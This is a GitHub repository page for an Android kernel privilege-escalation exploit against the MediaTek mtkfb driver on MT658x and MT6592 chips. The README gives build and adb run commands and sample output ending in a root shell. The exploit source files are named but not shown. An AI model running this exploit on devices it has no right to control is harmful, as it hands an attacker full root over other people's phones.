Skip to content
mtkfb exploit for mt658x & mt6592
Branch: master
Clone or download
Pull request Compare This branch is even with ele7enxxh:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Android.mk
README.md
escalation.c
escalation.h
mtkfbExploit.c
mtkfbExploit.h

README.md

MtkfbExploit

mtkfb exploit for mt658x & mt6592

Build

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk

Usage

connect your phone via adb

adb push ./libs/armeabi/mtkfbExploit /data/local/tmp
adb shell
cd /data/local/tmp
./mtkfbExploit

if your device is vulnerable, you will see output like this:

dispif_info_addr=0xc0de9424
Spraying thread done!
Trying exp with display_id: 0x80445e61, magic_num: 0xcec1c000
1 round...
We need to get root here!
Root success!
shell@hwH30-T00:/data/local/tmp # id
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:kernel:s0
You can’t perform that action at this time.